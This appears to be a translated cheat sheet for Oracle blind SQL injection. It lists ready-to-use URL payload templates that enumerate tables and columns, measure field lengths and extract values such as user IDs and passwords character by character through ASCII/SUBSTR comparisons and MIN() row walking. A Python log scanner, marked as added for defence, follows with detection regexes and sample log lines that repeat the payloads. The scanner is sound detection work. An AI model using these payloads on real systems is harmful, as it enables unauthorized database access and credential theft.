Oracle blind SQL injection [source unknown]. For blind injection (BlindInject) in general, see the papers at 0x90.org.
1. Thorough: from Absinthe@0x90.org
2. Fast: from Google + CROWBAR
id=1+and+(select+count(*)+from+users)>0
id=1+and+(select+count(*)+from+##1##)>0
(##1## is a table name read from a file of candidate table names)
id=1+and+(select+count(userid)+from+users)>0
id=1+and+(select+count(##2##)+from+##1##)>0
(##1## is a table name read from the file of tables found to exist; ##2## is a column name read from a file of candidate column names)
This yields the likely table names and their columns, for example USERS(USERID,USERNAME,PASSWORD).
Reading the data is the key step. Oracle's float and varchar data types can both be compared by magnitude, which makes reading the data one character at a time convenient.
id=1+and+(select+length(userid)+from+users)>1
id=1+and+(select+length(userid)+from+users)%3d##1##
(##1## is a number from 1 to 32)
id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(USERID)%2c1%2c1))+FROM+USERS)%3d48
id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(MIN(USERID))%2c##2##%2c1))+FROM+USERS+WHERE+USERID>'0')%3d##1##
(##1## is a number from 48 to 123, covering digits and letters; ##2## is a number from 1 to 32, the position within USERID up to its length)
id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(MIN(USERID))%2c##2##%2c1))+FROM+USERS+WHERE+USERID>'LASTUSERID')%3d##1##
(LASTUSERID is the USERID obtained in the previous step)
id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(MIN(USERNAME))%2c##2##%2c1))+FROM+USERS+WHERE+USERID='31245')%3d##1##
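As an added defensive example (not from the original page or its sources), a Python log scanner that flags the boolean-based probe patterns listed above (count, length, ASCII/SUBSTR and MIN()/WHERE row walking) and the clients repeating them. The signature names, request-log format, threshold and sample log lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Signatures for the boolean-based blind probes shown above, applied to the
# URL-decoded, lower-cased query string so "%3d", "%2c", "+" and mixed case
# normalise before matching.
BLIND_SIGNATURES = [
    ("count_probe", re.compile(r"\band\s*\(\s*select\s+count\s*\(")),
    ("length_probe", re.compile(r"\band\s*\(\s*select\s+length\s*\(")),
    ("char_probe", re.compile(r"\bascii\s*\(\s*substr\s*\(")),
    ("row_walk", re.compile(r"\bmin\s*\(.*\)\s*from\s+\w+\s+where\s+\w+\s*>")),
]
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def matched_signatures(url):
    """Names of the blind-injection signatures present in one request URL."""
    query = unquote_plus(urlsplit(url).query).lower()
    return [name for name, pat in BLIND_SIGNATURES if pat.search(query)]

def scan_log(lines, threshold=3):
    """Return (hits, enumerating_ips): hits is (ip, url, signatures) per
    matching request; enumerating_ips are clients with >= threshold hits,
    the fingerprint of the ##1##/##2## iteration (one request per value).
    """
    hits, per_ip = [], Counter()
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        sigs = matched_signatures(url)
        if sigs:
            hits.append((ip, url, sigs))
            per_ip[ip] += 1
    return hits, {ip for ip, n in per_ip.items() if n >= threshold}

# Constructed sample log lines (not real traffic), Apache common log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2000:13:55:36 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2000:13:55:37 +0000] "GET /item?id=1+and+(select+count(*)+from+users)>0 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2000:13:55:38 +0000] "GET /item?id=1+and+(select+length(userid)+from+users)%3d5 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2000:13:55:39 +0000] "GET /item?id=1+and+(SELECT+ASCII(SUBSTR(TO_CHAR(MIN(USERID))%2c1%2c1))+FROM+USERS+WHERE+USERID>\'0\')%3d49 HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Oct/2000:13:55:40 +0000] "GET /search?q=count+me+in HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

A real deployment would match on the decoded parameter values rather than the whole query and tune the threshold per endpoint; the point is that the enumeration loop leaves a burst of near-identical requests from one client that differ only in a numeric comparison.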